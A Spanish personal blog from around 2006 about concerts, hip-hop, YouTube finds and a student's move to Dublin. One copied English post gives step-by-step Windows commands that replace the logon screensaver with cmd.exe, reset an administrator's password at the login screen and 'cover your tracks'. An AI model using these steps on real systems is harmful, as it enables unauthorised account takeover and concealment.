Viva Alemanía

Trailer Los Simpson

Leo en Micrsosiervos algo que yo no sabia!! Van a sacar una pelicula de los Simpsom!! Y...para abrir boca...el trailer en español!! oeee oeee oeee que rico que rico.

Concierto Rapsoda

Concierto Hiphop
Madrid
Viernes, 15 de Diciembre
Actuarán:
Rapsoda + Proyecto Sudamerica + TCAP + 124 + Los jardineros
Lugar: Babylon 13 c/ amor de dios
Metro: anton martin
Hora: 21h.
Precio: 6€ con consumicion

VUELVE A CASA

Vuelveeeee a caaasaaaaa vuelveeee por Navidaaaad.

Si señores, vuelvo al barrio por Navidad. Vuelvo mañana Martes 12 de diciembre (el avion llega a las 7 a barajas) y me vuelvo el domingo 7 de enero. Ya ire llamando a tol personal mañana o pasado.

Nos vemox!


Actualizacion
: no puedo dejer de poner un par de curiosidades antes de dejar esto. La primera es un tio que se ha currado una bici que pinta en el suelo el mensaje "I love New York". No se como coño lo ha hecho pero mooola mazo. En la pagina hay videos. Link La otra cosa: un corto muy gracioso, sobre el diario de un niño de 11 años (en ingles) Link. Muy bueno

Peliculas antiguas gratis

Os molan las pelis/series/musica antigua? En esta pagina recoplian un monton de cosas de estas, cuyos derechos (copyright) ya han expirado. Es decir, es legal ponerlas en youtube!!

http://www.jonhs.net/freemovies/

Ideal para samplear.

Y lo mismo, pero en forma de links para torrent:

http://www.publicdomaintorrents.com/

(via del.icio.us de los Tarados)

Fotos

Victor me acaba de enviar las fotos de vuestro Halloween (2 meses despues!!). Dioooooos que grande que grandee. os dejo un par, pal que no estuviera.






Que grandes.

Tb os dejo una de la fiesta en la que estube el miercoles, con mis amiguitos de clase. Buena gente!


Emm creo que no se me ve muy bien. Buah, da igual. Estoy al fondo, en el centro.



Bueno, a pasar buen finde!!

ATOMIC PROBE

Por fin esta aqui. Damas y caballeros....mi primer video (bueno, mi segundo, Hares!).

La cancion se llama "Atomic Probe" y es electrillo vacilon. Y el video...buff que de curro tiene!! espero que me pongan buena nota por el (porque por supuesto es para clase!).

Para el video hice fotikos de edificios y cosas de Dublin, y de un munecajo que me he comprado explicitamente (los 6 euros mejor invertidos de la historia!! jajaja). Duespues....retoque en Photoshop (me encanta) y despues Adobe Premiere para animar todas las capas.
Lo mas infernal ha sido el tema de exportarlo. Que si compresiones, que si ratios que si yo que se....mil mieldas. Bueno, pero creo que al final lo he conseguido. Una copia exportada en alta resolucion, y otra en baja, para subirlo a Youtube.


El resultado...bueno, a ver que os parece!!




Aqui el link para el que no vea el video:

http://www.youtube.com/watch?v=8RbEyRrTC-c


Comentarios? dudas? sugerencias?

GRANDMASTER FLASH



Bueno, chavales, vosotros al klubbers. Vale, de acuerdo, cacho de fieston que me pierdo. Pero.....yo hoy voy a ver a....GRANDMASTER FLASH. Ahi es nada. Voy con un par de companeros de clase y con Pilar. Ya os contare la experiencia. Mientras, os dejo con un video para poneros los dientes largos.

LORENA C

LORENA C son Lorena Castell y MNSXY. Ella es actriz, presentadora de televisión, show-woman. Él es DJ, productor, remezclador, co-creador del FEA Festival.

LORENA C se lo chanaron en PROYECTO AUTOR , hasta al punto de que les ha servido para lanzarse a grabar su primer album. Mientras lo terminan, se presenta ELECTRÓNICAUTOR-Volumen II , en el que se incluye su flamante nuevo videoclip ROCK YOUR BODY. Electro, porno, y provocador a partes iguales. Mooola

Asi se llama la nueva mixtape de DJ Mindruss. Se trata de un DJ de Miranda de Ebro....que no recuerdo como pero el caso es que es amigo en Myspace (estas cosas pasan).

Pues el chaval se ha currado una mixtape de Funky setentero rico rico. Si pulsais sobre la imagen...os llevara a megaupload para descargarla.





Y este es su myspace.
Actualizacion: y este es su blog! no tiene desperdicio!!

Mas videoclips

Continuamos con maaaas videoclips. Esta vez...un poco de beat box. Freak power always.








Aqui los links por si alguien no ve los videos:
http://www.youtube.com/watch?v=ahpvSasR6d8
http://www.youtube.com/watch?v=23YI1bWAuMY

Una gran pregunta

Cual es el sentido de la vida, del universo y de todo?

Esa si que es una graaaaan pregunta. Y por suerte tiene respuesta, aunque sin lugar a dudas, es mucho mas completa la respuesta en ingles.


Asi que leer un poquillo eso...y ya sabeis, si alguien a partir de ahora os pregunta que cual es el sentido de la vida, del universo y de todo? podreis responder......42!!

Si es que hasta google lo sabe.

Filosofia del Sexo

Os dejo un par de perlas. Son un poco machistas....

¿Conoces esa mirada que tienen las mujeres cuando quieren sexo contigo? Yo tampoco.

– Steve Martin


Hay un gran número de dispositivos mecánicos pensados para aumentar la libido, particularmente entre las mujeres. El más efectivo es el Mercedes-Benz 380SL.”

– Lynn Lavner



Una vez, mas, via Historias Salvajes

November 2nd, 2006 by Quinn Zerfas

This is a cool little trick I’ve picked up in my travels and decided to share it with you fine and ethical individuals =). Log in and go to your DOS command prompt and enter these commands exactly:

cdcd\windows\system32
mkdir temphack
copy logon.scr temphack\logon.scr
copy cmd.exe temphack\cmd.exe
del logon.scr
rename cmd.exe logon.scr
exit

So what you just told windows to backup is the command program and the screen saver file. Then you edited the settings so when windows loads the screen saver, you will get an unprotected dos prompt without logging in. When this appears enter this command that’s in parenthesis (net user password). So if the admin user name is Doug and you want the password 1234 then you would enter “net user Doug 1234″ and now you’ve changed the admin password to 1234. Log in, do what you want to do, copy the contents of temphack back into system32 to cover your tracks.

Singularidades

Pido perdon por anticipado, porque esta frase es mu friki. Pero es que no me podia resisistir:

Los agujeros negros son esos puntos donde Dios se ha equivocado y ha dividido por cero.


(Via Historias Salvajes)

Este Blog de Historias salvajes es la canna de Espanna. Me parto con el.


Ah, bueno, y ya que estamos...os dejo un video de los Electric Fence.

Combate a muerte de Trilogias

Os dejo unos momentos gloriosos de Clerks 2. Gloriosos.

Music for Robots


Interesante disco! "Music for Robots", de Forrest J. Ackerman and Frank Coe, un vinilo de 1964. En el link, nos lo podemos bajar. El disco consta de 2 pistas. La primera es un repaso narrado de la historia de los robots . La segunda...es propiamente la "musica de los robots".

Link

Friiiiky friiiky, isn't it?

Dublin Electronic Festival

Se celebra la semana que viene el DEAF 2006 en Dublin. Es un festival de musica electronica contempoarena. Es decir, espectaculos multimedia, sesiones de djs modennos, y musiquillas elestronicas. Y como no, el grupo MMT está metido en ello (el MMT, Music and Media Technologies, es donde estoy yo). Participa la directora del Master y otros dos profesores, con otras gentes en un espectaculo llamado if()then()else(). Es una cosas que mezcla audiovisuales, musica y teatro. Suena bien. Iremos a verlo!


Bueno, y por lo demas...todo bien! ya estamos empezando a hacer cositas je je je. Ya os contaré.



Ah, y para los morbosos...en la pagina de if()then()else(), al final hay una foto de la directora del master (se llama Fionnuala)!.

IRISH NEWS

[sobre el Master]

Bueno, pues ayer fue la presentacion del master. La directora del master (que porcierto, tiene un morbazo maaximo) y otros 2 profesores nos presentaron todas las asignaturas, los laboratorios que tenemos disponibles, el estudio de grabacion, etc... Todas las instalaciones las tenemos disponibles 24/7. Aaaaaupa. Las clases empiezan el lunes, y suelen ser...de 11 a 4, o una cosa asi. El viernes que viene la directora ha organizado un meeting de bienvenida. Es decir, reunion, risas, y al pub a tomarla. Para que os hagais una idea, ella queria hacerlo a las 5, pero en la cafeteria del Trinity no sirven alcohol hasta las 6, asi que el meeting de bienvenida se retrasa hasta las 6. La verdad es que pinta teeeela de bien. Os dejo aqui la lista de las asignaturas que voy a tener:

Introduction to MIDI
Psychoacoustics 1
Studio Techniques 1
Survey of Electro-Acoustic Music 1
Csound and Synthesis 1
Music and Image Survey
Media Technologies
Music and Image Technologies
Maths/Programming**
Aural Training**
Music Theory**


[sobre los companeros]

Pues despues de la presentacion nos fuimos a comer, y luego al pub a tomar unas pintas (protocolo habitual por aqui). La verdad es que son mazo de majetes. Hay uno que es profesor de guitarra espanola, otro es pinchadiscos en un pub (y pone RAP, de hecho, con este ya he quedado en hablar de cosistas jejeje), otros vienen de estudiar noseque multimedia, otra viene de musica (conservatorio o algo asi), otra es disenadora grafica, etc....Ah! y hay un griego que es matematico. Ese tb es mu majete, y ademas como es de fuera, le entiendo de pm (cuando un irlandes se ponde a hablar con otro, despues de 2 pintas....joder no hay quien les entienda).


[sobre el resto]

Todavia no tengo casa!! tocate los cojones. Llevo una semana pateandome la ciudad. He visto nosecuantas casas...y na! O son una kk, o hay mazo de gente interesada y no me cojen a mi. En fin, luego voy a ver otra, y voy a llamar a una chica que busca hosemates, en fin, a seguir intentandolo. Pero bueno, de momento vivo con mi hermano, asi que tranquilamente.

Ya he conocido a unos cuantos espanoles (amigos de mi hermano, o amigos de amigos de mi hermano), todos mu majetes. Y...como no! estamos pillando buenos macas. Es decir algo bastante decentillo, para estar aqui. jejeje

En fin. Ya os seguire contando las novedades.
Byeee

Irish News

Hi everybody!! Finally, I'm in Ireland! Perdón por tardar en dar señales de vida, pero es que ando muy liado!
Estoy viviendo con mi hermanito, en su casita, en el sur de Dublin . Estoy buscando casa, para convertirla en mi hogar. Ya he visto un par, pero hay que seguir buscando. Las clases empiezan el lunes que viene (el 9 de oct creo que es). He ido a la presentacion para los nuevos alumnos de postgrado...y bah, nada de especial. El jueves es la presentación del master, y eso estara mejor.

Bueno, ya os contaré mas cosas. Y ya subiré unas fotillos.

Bye folks!

Series a Tutiplén!!

En esta página podemos ver tooooodos los capitulos de toooodas las temporadas de Los Simpson y de Futurama, Padre de Familia, South Park y Padre Made in USA Parece dudosamente legal, pero de momento las aguantan. Lo único malo, es que están en inglés, aunque se entienden muy bien. Y asi...practicamos un poquito de ingles, que carajo!


Todas las series aqui: [dailyepisodes.com]


(Via Microsiervos)

Videos de la Rave

Chispi ha subido a youtube algunos videos que grabó en la rave. Christian L, Luky y DJM pinchando musiquina. Uno de ejemplo:


El resto aqui:
http://www.youtube.com/watch?v=l3vA4jOf6oQ

Por favor, si alguna vez vais andando por la calle, y os encontrais esto.....















...o esto otro
















...por favor mátalos a todos. Asi sufrirán menos.
MÁTALOS!!

(via Resistance is Futile)

Kontrafiestas de Vallekas

Aqui os dejo los conciertillos de las fiesta de vallekas:

Viernes 15 de Sept.
Conciertos.
-SORKUN (Guipúzcoa).
-LOS ASLANDTICOS (Cordoba).
-ALAMEDA DOSOULNA (Madrí).
-HOT DROP (Madrí).
A partir de las 21:00 h.

Sábado 16 de Sept.
Conciertos.
-LA KINKY BEAT (Barna) + DJ. RUDEMAN (Bologna).
-MAKALA (Zarautz).
-GUALITXO (Iruña).
-EINSTEIN (Madrí-Buenos Aires).
A partir de las 21:00 h.


Mas info aqui.

UFO Alien Invasion

Vamos con un par de juegos clásicos, de esos que han marcado nuestra infancia. El primero de ellos es UFO. Esos combates por turnos contra los alienígenas, esas mejoras en el equipo de cada soldado....dios, que recuerdos. Y como es un juego muy friki....pues hay mucha gente que lo recuerda con cariño. Tanto, que han hecho una copia OpenSource de él. Ésta es la página inicial. Yo ya me lo estoy bajando!!


Y...otra maravilla: Tyrian 2000. Sin lugar a dudas el juego de naves mas adictivo al que he jugado!! Os lo podeis bajar de aqui.

IMPERO 2.0

Bueno, pues ya está casi terminado el segundo sistema IMPERO. EL primero se lo tiene que quedar el departamento, por lo que me han pagado los materiales para que me construya otro idéntico, para mi. Y ya que estaba....pues he rediseñado el exterior (thanks JoseK por las ideas).
Ah, y otra cosa que quería comentar: el nombre de mi nueva maqueta. A ver que os parece este:

(Cassete diseñado con Cassete Generator)

Bueno....y cada vez queda menos para que me vaya. Me iré...el 27 de Septiembre o asi. Irlanda me espera!! Ah, y....bueno, se aceptan regalos de despedida!! jajajjajaja.

Sin Permiso



hola gente, sin permiso, el grupo de moda q todos y todas quereis oir, tiene colgada su maqueta en la pagina web mas importante del hiphop en nuestro pais!!!

este es el enlace:

http://www.4x4hiphop.net/grupos_maqueta_sinpermiso_sinfoniasorquestales.htm
bueno, para los q no se lo creian, pues ya esta aqui!!!

Os recuerdo q en el emule podeis bajaros las dos maquetas: "el año de las luces" y "sinfonias orquestales", que en
www.sinpermiso2004.com podeis encontrar mas info del grupo, y q se esta empezando a trabajar para LA GIRA DE OTOÑO DE SIN PERMISO.

TSPO saco nuevo disco el 7 Junio con nueva gira en la que podremos verlos de nuevo en España el 31 de Agosto en la sala Caracol y la entrada son 15 euros, igual que el año pasado, teneis mas info en la pagina de los TSPO y en Reggae New, os dejo los link.adios

Sitema IMPERO

Bueno nenes, pues eso, lo que pone en la sección de noticias. El menda ha acabado la carrera. Y me voy a Cadiz a celebrarlo. Playita, sol, y desconectar de Madrid. Alli me la voy a enganchar gorda. Que me lo he ganado!!

OEEEEEEEE!!!!!

OEEEEEE!!!!


Por cierto no han estado mal las fiestas de Villalba, eh?? Ver al Chaski borracho ha sido impagable!!! jajajajaa

PD: por cierto, por mi proyecto fin de carrera me han dado una bonita Marticula d Honor. Oleeeeeeeee

Zizou VS Fidel

Por fin un futbolista que se atreve a entrar en política. jajajajajajajajajajajaja
me parto la caja con este montaje.


http://www.youtube.com/watch?v=G1MT0ja4RdM

Anuncios farmacéuticos

Al lorito con esta galería de fotos de flikr. Son anuncios de medicamentos de los años 60-70 de la revista "Clínica rural". Realmente....son carne de portada, eh?



(via BoingBoing)

Huérfanos Electrónicos





















Mientras Cálico Electrónico sigue desaparecido...Muzamán ha decidido crear un nuevo grupo de superhéroes para proteger Electronic City.... Ellos son los Huérfanos Electrónicos, la nueva serie en Flash de NikoDemo, ese peaso de artista. De momento llevan 2 capítulos. Echadle un ojo, que te partes...

Un friki enamorado











Que bonito es el amor, y que mala es Robocop 3.

De estas y otras cuestiones amoroso/frikis trata este cortometraje de Ciro Altabás. Y como el chaval es mu majete, pues lo ha colgado en google video. La verdad es que no está mal, es divertido. Mira que dejar a tu novia por no saber como se llama ese robot bajito y gracioso de la guerra de las galaxias....

Y bueno, ya que estamos con amor friki, otro link:

www.fastseduction.com

Madre mia. Miles de tutoriales, FAQs, foros, listas de correos...de todo. Mil cosas para conseguir que personajillos como nostros se conviertan auténticos latin lover. Si, si, reiros, pero los de esta página se lo toman muy en serio. Lo único malo (para algunos) es que está inglés.

Por cierto.....que tres cosas hacen siempre que una pelicula sea mas interesante? Evidentememte: Zombis, Ninjas o Cyborgs. Evidentemente!!!

Crónica de un concierto

Madre mia! que peaso de concierto el de ayer. No Repy, Alamedadosoulna y Minister. Eso si que fue un no parar de bailar!! ska ska ska! Mucha gente y mucho calor en la sala Heineken, pero dió igual. Todo el público bailanod hasta las 2 que se acabó.

No Reply: Estos chavales son increibles! A nivel técnico, los mejores de todos (para mi gusto). Son muy buenos. Y unos cachondos!

Alamedadosoulna: Espectáculo. Puro espectáculo. Esa intro inpresionante (al lado suya los Blues Brothers son unos sosos!), y esos gags. Como se notan que tienen muchos conciertos a sus espaldas. Fiesta fiesta!

Minister: Hermanos y hermanas!! ronsteady del bueno!


Total, llegué a casa alas 4, y hoy...a descanar!!


Por cierto, he actualizado la sección de fotos!!

Concierto en Rivas

Fecha: Sábado 24 de junio
Lugar: Polideportivo Cerro del Telégrafo
Av. de los Almendros S/N
(Rivas Vaciamadrid)
Precio: GRATIS

¿quien toca? Nadie importante...

OJOS DE BRUJO
GORAN BREGOVIC
ASIAN DUB FOUNDATION

Mas info en:

http://www.culturaenlacalle.org/

El FIB es Chanante!!

Pintar trenes está muy visto. Los grafiteros han dado el siguente paso. Ahora hay que pintar aviones. Y si es el AirForceOne, mejor que mejor!



EL link de youtube:

http://www.youtube.com/watch?v=_fBIgeX0LG0

Mas info:
http://www.stillfree.com/

(Destaca el video en el que explica porqué se pinta el Avion del Presi)



Hola hombres sin remedio solo decir que para el que le interese los TSPO han sacado nuevo disco y con ello inician un nueva gira en la que pasaran por España el dia 31 de Agosto en la Caracol, el precio 15 euros( venta de entradas en Up-Beat), al fin nos volveremos a encontra, estaba deseando verlos otra vez, y por supuesto que le voy ha ver.

Teneis mas informacion en la pagina web del grupo
http://www.tokyoska.net/index.html

o en la pagina de Reggae News
http://www.reggae-news.net/modules.php?op=modload&name=Calendario&file=index&type=view&eid=4280

Madrid Ska Festival


Me comenta Cándido un concierto al que VAMOS A IR TODOS. Por mis cojones!!


Algún desviado se ha dedicado a coleccionar escenas confusas de videojuegos. Confusas? eso que quiere decir? Quiere decir que los protagonistas de los videojuegos son seres puros, y llenos de virtudes. NO son unos depravados a los que les encante fornicar. Se trata de terribles confusiones!! jajajajajajaa

Muchos mas en The Accidental Video Porn Archive.




The Skeletor Show

Otra perla de Youtube: La nueva sit-com, protagonizada por Skeletor!!. Un adorable personaje de nuestra infancia. De momento llevan 1 trailer y 3 capítulos. Aqui. (está en ingles, pero se entiende mu bien).

(Via Resistance is Futile)

SouthPark y la pirateria

Dios mio. Acabo de ver la luz. Ramoncín estaba en lo cierto. La pirateria es mala. Mala, mala. Lo explican en Southpark.

(Via David Bravo)

La Sierra en Cautrosfera

POPO!! Aqui está el video del reportaje que nos hicieron los chicos de Cuatro. Resulta que lo pusieron el dia 12 de abril...y nadie me avisó!! Bueno, por lo que me han contado...nadie se enteró realmente. En fin, da igual, porque a esas horas nadie puede verlo en la tele, y como los videos los ponen en la web, pues de p.m.


Despues de verlo un par de veces.... Se me ocurren algunos comentarios:

  • YO NO SALGO!!!!! Solo se me ve medio segundo, y de espaldas. Solo se ve mi maldita coleta (que por cierto ya no la llevo). Ni las preguntas que me hicieron..ni ná!! En fin. Que se le va a hacer.
  • A todos se les nota que estabamos nerviosos. Es que hablar delante de la cámara....impone.
  • Me mola que salga Rapsoda, MetalPesado, Siervo y Ábaco. Mi gente en esto del rap.
  • El resto.....pfff bueno, bastante regular (tanto por el montaje de los de Cuatrosfera como por nosotros mesmos).
Ah, por cierto, ya está terminado el MySpace de LaSierra.

Oooh baby!!

Navengando por la blogosfera, se descubre cuanto friquismo existe en el mundo. Impresionante video en directo del grupo Tripod. Está subtitulado en español. Via menéame.

Guitarra + Kaoss Pad

Esto le va a molar al Yaryar: un menda que se ha contruido una guitarra eléctrica, y le ha puesto un Kaoss Pad. Como curiosidad no está mal, no?.



(cortesía de Cándido)

Nuclear si, por supuesto

Esto va dedicado al Rulo: El videocplip de Aviador Dro de "Nuclear si, por supuesto". De 1983. Ahi es ná.



Aqui hay otros videos míticos de los 80. Desde Alaska, a Leño, Kiss, Kortatu...buah!! una lista impresionante. Me mola youtube.

Uff!! por fin vacaciones. A ver si descansamos un poco, que falta hace. Y a ver si quemamos el sinte nuevo!! po po!!

Una perita dulce: la última tonteria graciosa (graciosa de verdad!! que ya es wraro) que me han enviado:

¿VIVIR EN ESTA ÉPOCA IMPLICA QUE...?

1. Accidentalmente tecleas tu password en el microondas.

2. No has jugado al "solitario" con cartas de verdad en muchos años.

3. Tienes una lista de 15 números telefónicos para localizar a tu familia ¡¡de sólo 3 miembros!!.

4. Le envías un e-mail a la persona que se sienta junto a ti.

5. La razón que tienes para no estar en contacto con tu familia es porque no tienen correo electrónico.

6. Te vas a casa después de un largo día de trabajo y cuando suena el timbre de tu teléfono fijo, te preguntas que te querrán vender, porque ninguno de tus amigos lo usa ya (eso si es que tienes teléfono fijo).

7. Cuando haces llamadas telefónicas desde tu casa, marcas el "0" para que te dé línea.

8. Has estado sentado en el mismo escritorio cuatro años y has trabajado para 3 empresas distintas. O bien has estado en edificios de 4 compañías diferentes y tú siempre trabajabas para la misma.

10. Tu jefe no tiene la habilidad para hacer tu trabajo.

11. Cuando llegas a casa de alguien no le llamas al telefonillo, sino que le haces una llamada perdida para que baje.

12. No tienes suficientes enchufes en casa para todos tus aparatos electrónicos. Si pones a cargar el móvil tienes que quitar el cargador de pilas, el MP3 o la IP.

13. Salir de tu casa sin móvil -el cual no has tenido los primeros 20, 30 ó hasta 60 años de tu vida- te da pánico y regresas a por él.

14. Te levantas por la mañana y te conectas a internet a leer elmundo.es antes de tomar tu café.

15. Mnds msjs cm st.

16. Estás mirando alrededor para asegurarte de que nadie te ve que estas sonriendo enfrente de tu PC.

17. Estás leyendo esto y te estas riendo.

18. Peor que eso, ya sabes perfectamente a quién le vas a enviar este correo.

19. Estás tan distraído leyendo que no te fijaste que falta el número 9 en esta lista.

20. Y ahora acabas de mirar hacia arriba para ver que efectivamente no está el numero 9.

21. Y ahora te estás riendo de ti mismo, del careto que has puesto.

P.D.: Y no digas que no.

Nuevo disco de Mike Patton

Leo en korochi, que ya está apunto de salir el esparado nuevo disco de Mike Patton. Tras muchos muchos retrasos parece que por fín va a salir a la luz. Impresionante la lista de colaboraciones: Norah Jones, Kool Keith, Massive Attack, Rahzel....Jaaarl!!
Por cierto, el proyecto se llama Peeping Tom (no confundir con los mágicos The Peeping Toms!!)

Clerks 2

Kevin Smith está trabajando en su nueva película: nada menos que Clerks 2. En www.clerks2.com se puede ver el trailer (en inglés).

Mas cosas frikis:
Un post en punto y aparte, en el que incluyen un video...incredible. Os mola el Final Fantasy?

Y... STAR WRECK: unos finlandeses mu frikis que se han currado una película enterita. Una mezcla de star treck y Babylon 5. Por lo visto es en plan coña total, y tiene muy biena pinta, mu curraos los efectos especiales. En su casita y en los ratos libres. Porque ellos lo valen. La peli está para descargarse en la página, aunque está en perfecto finlandés (aunque con subtitulos en español).

Herramientas Web

Os comento un par de herramientas web que he empezado a utilizar hace poco. Útiles ante todo. La verdad es que he buscado bastante, sobre todo porque necesitaba que cumpliesen 2 requisitos: que fuesen gratis, y que fuesen aplicaciones web. Sin tener que isntalar nada, y acesibles a través del navegador. Asi puedo acceder a ellas desde casa, desde el curro o desde la escuela.


Google Reader: Lector de RSS. Rápido, fácil y cómodo. No hace falta darte de alta si ya tienes una cuenta de Gmail.

Backpack: Aplicación para anotar listas de tareas pendientes, notas, comentarios, subir archivos, fotos. Muy útil para organizarte. Una agenda virtual accesible desde cualquier lado. A la porra las PDA´s!!


Acero en Bangladesh

Un impresionante reportaje gráfico sobre las playas de Bangladesh. Un cementerio de barcos, que son desmontados por miles de personas. A alguien mas le recuerda a MadMax o Waterworld?















(via Alt1040)

Lunes Sangriento

Que sueño hace en lunes, y que solecito mas majete en el exterior.

Mientras seguimos con las pruebas de las drogas (Hares hace de conejillo de indias), un par de links:

www.yebouna.com: Grupo de rock urbano de Madrid. Concretamente de la escuela. Ahí, representando.

http://www.myspace.com/elhombresinremedio: Ya está listo el MySpaces de HSR. En cuanto saque un ratillo actualizo la página para que se pueda acceder a él cómodamente.

Ah, y un correo graciosillo:


Hay un nuevo virus. Se llama "TRABAJO". Si recibe TRABAJO de sus colegas, su jefe, por e-mail, o de cualquier otra persona, no lo toque bajo ninguna circunstancia... Este virus es extremadamente peligroso ya que elimina su vida privada completamente. Si ha estado en contacto con este virus, escoja a dos amigos y vayan inmediatamente al bar más próximo.Pidan unas cervecitas, y después de tres rondas se dará cuenta que TRABAJO ha sido completamente eliminado de su cerebro. Mande esta alerta de virus inmediatamente al menos a 5 amigos. Si repara en que no tiene 5 amigos, esto significa que ya está infectado por este virus y TRABAJO ya controla su vida. Si este es el caso, acuda inmediatamente al bar y permanezca ahí hasta que haya hecho al menos cinco amigos.
Luego inténtelo de nuevo.

prueba

marihuana porro hachis cocaina lsd

CENSURA!

El blog ha estado caido un par de dias, hasta que he descubierto el motivo. Estoy casi seguro de que el motivo ha sido la CENSURA desde blogger.

Todo por el post del Rulo. Ya sabeis la mar****na y los po***s. En cuanto he borrado el post desde el administrador...tachan! ya vuelve a estar el blog. El efecto ha sido instantaneo, por lo que la relación parece clara, no?

En cierto sentido...les entiendo. Poner cosas de drogas...es ilegal...y los responsables del contenido son ellos (es cierto, legalmente son ellos los responsables, el marrón se lo comerían ellos). Si, esto tiene su miga. Por ejemplo, en un foro. Resulta que el administrador es el responsable de los comentarios de la gente. Y si hay movidas legales por algún comentario del foro (yo que se, porque publiquen un crack de un juego, o un manual para construir una bomba...) el responsable es el adminsitrador del foro. Asi de sencillo. Al que se le cae el pelo es al administrador. Y punto.

Yo ya sabia esto, por eso en cuanto he visto que no era un problema puntual (que estubiesen revisando los servidores o algo asi)...enseguida me lo he olido.

En fin.

Comentarios, por favor?

Klubber´s Day


Teneis algo que hacer el viernes 14 y el sábado 15 de abril?. Me refiero a algo mejor que esto:



Impresionante cartel. Y donde es el magno evento? En el Madrid Arena. Es decir, el pabellón multiusos del Recinto Ferial de la Casa de Campo (donde se celebró el Master Series de Madrid ,vamos).

Toda la información en:

http://www.klubbers.com/

Os dejo además una gran frase de los programadores Klingon:

¡Un verdadero guerrero Klingon nunca utiliza comentarios en su código!

Los Simpson

Impresionante documento. El principio de Los Simpsons grabado con actores reales!!






Ah, y un resumen de los próximos conciertos:

Soulfly: Tocan el lunes 27 de Marzo en la sala Heineken. 18€.

Skalariak: Tocan el viernes 31 de marzo también en la sala Heineken.

La KinkyBeat: Tocan con La MarchaHormiga el jueves 23 de marzo en Gruta77. 8€

Festival Allende los Mares: Mártires del Compás, ElBicho, Tabletón, Fritanga, Canteca de Macao. Sábado 25 de marzo en la Cubierta de Leganés. 33€

y...creo que nada mas. Así son las cosas y asi se las hemos contado!!


La Sierra en hipHopTuning

Aqui os dejo los links a los 2 reportajes que YA han dedicado en el programa HipHopTuning de Cuatrosfera a gente de la Sierra.

[J.Pelirrojo en HipHoptuning]

Dedicado a Jodido Pelirrojo.

[DosHermanos en HipHopTuning]

Dedicado a DosHermanos.

Un par de comentarios:

  • Los TheMovidas (los presentadores) pertenecen al mundillo del FEA. Ya sabeis, electro-pop, pelucas, fashions y anti-fashions, modernos y modernos tan modernos que son anti-modernos. La verdad es que son mas tontos que masticar agua.
  • En cuanto a J.Pelirrojo y DosHermanos...puede que no os molen las cosas que hacen. DosHermanos están tirando ultimamente por el reggetón. Y el Pelirrojo sigue siendo muy suyo. Que no os guste su música ....vale. Pero respeto. Ante todo RESPETO. ok? Yosu y Gorka se lo han currado mas de lo que ninguno de vosotros se lo currará jamas para llegar donde han llegado. Si no os mola la musica que hacen...pues a otra cosa mariposa y punto.
Y recordad que próximamente...un reportaje dedicado exclusivamente a LASIERRA.
Po po!!!

Mejillones, panteras y perros

Hoy el autobus de la empresa se ha pasado la salida y hemos acabado en Fuencarral (en Vodafone, TeleCinco). Que grandioso. En mi proyecto...ya tengo una bateria electrónica. Tiene 4 pads (superficies para golpear), y ahora le estoy poniendo una pantalla LCD para poder configurarlo. Pinta bien.

Victor ha mandado una pequeña fábula sobre perros, panteras y monos:

Un señor va de cacería al África y se lleva su perrito para no sentirse solo en ese lugar. Un día, ya en la expedición, el perrito, correteando mariposas se aleja del grupo, se extravía y comienza a vagar solo por la selva.

En eso ve a lo lejos que viene una pantera enorme a toda carrera.
Al ver que la pantera se lo va a devorar, piensa rápido qué hacer. En eso ve un montón de huesos de un animal muerto y empieza a mordisquearlos.
Entonces, cuando la pantera está a punto de atacarlo, El perrito dice:
* Ah!,¡qué rica pantera me acabo de comer!!.

La pantera lo alcanza a escuchar y frenando en seco, gira y sale despavorida pensando:
* ¡ Quien sabe que animal será ese, no me vaya a comer a mí también!.
Un mono que andaba trepado en un árbol cercano y que había visto y oído la escena sale corriendo tras la pantera para contarle como la engañó el perrito:
* "Esos huesos ya estaban ahí, además es un simple perro".
El perrito alcanza a darse cuenta de la maniobra del mono. Después de que el mono le contó a la pantera la historia de lo que vio, esta última muy enfadada le dice al mono:

* "¡Súbete a mi espalda, vamos donde ese perro a ver quién se come a quién!".
Y salen corriendo a buscar al perrito. El perrito ve a lo lejos que viene nuevamente la pantera, y esta vez con el mono chismoso. ¿¿Y ahora qué hago??, piensa todo asustado. Entonces, en vez de salir corriendo, se queda sentado dándoles la espalda como si no los hubiera visto, y en cuanto la pantera está a punto de atacarlo de nuevo, el perrito dice:
* "¡Este mono hijoputa!,hace como media hora que lo mandé a traerme otra pantera y todavía no aparece!!!!

MORALEJA:
"EN MOMENTOS DE CRISIS, SOLO LA IMAGINACIÓN ES MAS IMPORTANTE QUE EL CONOCIMIENTO".
Procura ser imaginativo como el perro, evita ser agresivo como la pantera, pero nunca seas tan "hijoputa" como el MONO."

Otra cosa grandiosa:
Una página dedicada al pen spinning y otros "deportes" de manos. (pen spinning =el arte de girar el boli con los dedos ) Para que luego digan que Internet sólo sirve para chorradas ;-)

http://www.superhandz.com/videos.html#penspinning


Viernes: por la tarde terminé una base para Siervo y Metal Pesado (están preparando una maqueta juntos). Que temón. Por la noche copas en LosNegrales1, y pachangueo en el Edificio Europa. Me mata el pachangueo. Prefiero mil veces el reggetón. Quiero una papichula ya!!!

Sábado: Bajé a Madrid con gente de la Escuela. Lluvia, nieve, sangria, mojitos, romances entre amigos, música y llegar de día a casa. Curioso sábado. Desde luego, curioso. Por lo menos conocí a algunas chicas monas. Estubimos en las Cuevas Del Sésamo, en Lavapiés y acabamos en la sala ElSol. Curioso. Además alli vi a un compañero de tpi. Seguro que mañana no se acuerda de mi.

Domingo: He compuesto el próximo Hitazo de ElHombreSinRemedio. Electro electro y mas electro. Y de postre, electro.

Cada vez que leo el Blog de Isisbe se me saltan las lágrimas. Joder que mierda mas dulce.

He hablado con mi hermano. Tanarro ya está con él, y va a ir mas gente a Dublín con ellos. Mejor. Así mi hermano no estará solo. Me alegro.

He descubierto el blog de un argentino que me encanta. Ese tio es un crack. Un crack: http://www.korochi.com/


Doctor Esponja, un mejillón cabreado y otro en su salsa. Corto y cambio.

Ya ha salido la lista de las solicitudes admitidas. La lista también incluye las solicitudes NO admitidas, y el motivo. El siguiente paso es el sorteo....suerte!!

http://www.larcovi.es/pdf/LISTADO_PROVISIONAL_ALFABETICO.pdf

Por cierto....habeis visto el último mensaje del Libro de Visitas? Es de Juaaaaaancho, nada menos.
Un abrazo muy fuerte tio!!




Próximos conciertos

Dos conciertos:

SALA EL SOL
. Jueves 23. CALDO MAGNO + QUINTO PARPADEO. Precio: 6 euros en taquilla.

Fiestas de carnaval de Getafe (estación de Getafe Centro) 24 de febrero.
O´funk’illo + Celofunk + Desechos. A partir de las 9:30. Entrada gratuita.


Música Clásica para descargar

